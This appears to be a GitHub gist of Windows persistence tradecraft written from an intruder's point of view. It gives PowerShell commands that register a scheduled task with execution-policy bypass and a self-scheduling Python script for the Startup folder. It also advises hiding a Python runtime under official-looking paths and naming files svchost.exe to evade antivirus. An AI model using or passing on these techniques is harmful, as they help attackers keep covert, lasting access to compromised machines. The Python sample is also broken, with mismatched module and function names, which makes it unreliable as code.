Skip to content

Instantly share code, notes, and snippets.

@hyp3ri0n-ng

hyp3ri0n-ng/persistence_basic.md

Last active March 21, 2024 19:55
Show Gist options
  • Save hyp3ri0n-ng/bac83e8d4f98b8757a80b566e40e1fdf to your computer and use it in GitHub Desktop.
Save hyp3ri0n-ng/bac83e8d4f98b8757a80b566e40e1fdf to your computer and use it in GitHub Desktop.
Download ZIP
Python persistence (simple but works so shut it!)
Raw
persistence_basic.md

Re persistence, I've never liked the "super stealthy" methods I see out there. Every once in a while there's a really nice one that actually does bypass things. But then it gets attention and is mitigated or gets overwritten when you infect that obscure DLL and the user updates the file. In my experience, KEEP IT SIMPLE. I like python. It's not an executable file, you can put a static python executable on a machine and absolutely no AV is going to pick it up (hell you can throw whole folders on there if you don't want to use a static .exe). Name it like C:\ProgramData\Win32runtime\dlls\annoyingly\long\official\seeming\path\<ALL THE PYTHONS>

Most "real" reverse engineers and malware writers scoff at this, but hell I've been using this for a decade and it just works.

C:/> powershell.exe -c
"$taskTrigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Friday -At 3am;
$taskAction = New-ScheduledTaskAction -Execute "PowerShell" -Argument "-NoProfile -ExecutionPolicy Bypass -File 'C:\scripts\ADHealth.ps1' -WorkingDirectory 'C:\python-scripts\'; python my_script.py; Register-ScheduledTask 'My Task' -Action $taskAction -Trigger $taskTrigger"

or if you don't hate yourself and have the ability to run an interactive powershell on a box you land on. Do this in just powershell, write a script:

# scheduleMyTask.ps1
$taskTrigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Friday -At 3am

$taskAction = New-ScheduledTaskAction -Execute 'C:\python\path\python.exe' -Argument 'my_script.py myarg1 myarg2' -WorkingDirectory 'C:\my_py_script_dir\';

Register-ScheduledTask 'My Task' -Action $taskAction -Trigger $taskTrigger"

Then from powershell: PS> ./scheduleMyTask.ps1 (of course in the same dir as that script). Or in CMD C:\> powershell.exe powershell "& 'C:\scheduleMyTask.ps1'" or C:\> powershell.exe -File scheduleMyTask.ps1

Another option is a self-scheduling script in python :). Then you only have to manage one file really. The only downside is that if this is for work you can't blame Windows on "why it didn't run your perfectly configured task":

# schedule_this.py
# need to run pip install scheduler

import time
import scheduler

def do_my_thang():
    open("C:\\dothang.txt", "w").write("I'm just doing my thang.").close()

    
if __name__ == "__main__":
    schedule.every(6).hours.do(job)
    schedule.every(3).days.do(job)
    # As many schedules as you want

    while True:
        schedule.run_pending()
        time.sleep(1)


----------


# Examples from docs: 
[ReadTheDocs][1]
# Run job every 3 second/minute/hour/day/week,
# Starting 3 second/minute/hour/day/week from now
schedule.every(3).seconds.do(job)
schedule.every(3).minutes.do(job)
schedule.every(3).hours.do(job)
schedule.every(3).days.do(job)
schedule.every(3).weeks.do(job)

# Run job every minute at the 23rd second
schedule.every().minute.at(":23").do(job)

# Run job every hour at the 42nd minute
schedule.every().hour.at(":42").do(job)

# Run jobs every 5th hour, 20 minutes and 30 seconds in.
# If current time is 02:00, first execution is at 06:20:30
schedule.every(5).hours.at("20:30").do(job)

# Run job every day at specific HH:MM and next HH:MM:SS
schedule.every().day.at("10:30").do(job)
schedule.every().day.at("10:30:42").do(job)
schedule.every().day.at("12:42", "Europe/Amsterdam").do(job)

# Run job on a specific day of the week
schedule.every().monday.do(job)
schedule.every().wednesday.at("13:15").do(job)
schedule.every().minute.at(":17").do(job)    

It also has a ton more functionality that seems nice. How I'd use it: place it in Startup/ for example to make sure it runs on every boot. First run run it in the background, in cmd `START /B "C:/full/python/path/python whatever.py"` or in powershell in path where script is "python whatever.py &". 


----------


So there's a bunch of options for ya. Get rid of cmd though unless you're still on Windows 95 :P, it's touchy and terrible and commands can implement their own syntax for stuff like escape characters or args (looking at you Services). I'd rather throw my computer out the window (ha) and do the task manually. 
This method is primitive of course, but I've found that even bundling a python exe and placing it in startup is caught way way less than a polymorphic whatever-the-fuck 0.4Kb file or implant somewhere. In my experience, keeping it as simple and stupid as possible is the best way, less suspicious, and almost never detected.
In the startup folder just name it something official sounding `svchost.exe` `win32runtime.exe` etc etc.



  [1]: https://schedule.readthedocs.io/en/stable/examples.html
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment